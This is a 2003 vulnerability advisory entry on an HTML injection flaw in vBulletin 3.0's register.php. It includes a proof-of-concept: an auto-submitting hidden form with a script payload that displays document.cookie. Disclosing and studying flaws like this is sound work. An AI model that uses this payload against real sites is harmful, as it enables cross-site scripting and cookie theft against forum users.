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vBulletin 3.0 - register.php HTML Injection

🗓️ 06 Aug 2003 00:00:00Reported by Ferruh MavitunaType 
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vBulletin registration script vulnerable to HTML injection via user input in register.php fields.

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source: https://www.securityfocus.com/bid/8354/info

vBulletin may be prone to an HTML injection vulnerability. This issue is exposed through inadequate sanitization of user input for certain fields within the register.php script. An attacker may exploit this issue by including hostile HTML and script code in fields that may be displayed in posts to the message board, or the user's profile. This code may be rendered in the web browser of a user who views the malicious message.

[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /] 
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

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06 Aug 2003 00:00Current
7.6High risk
Vulners AI Score7.6
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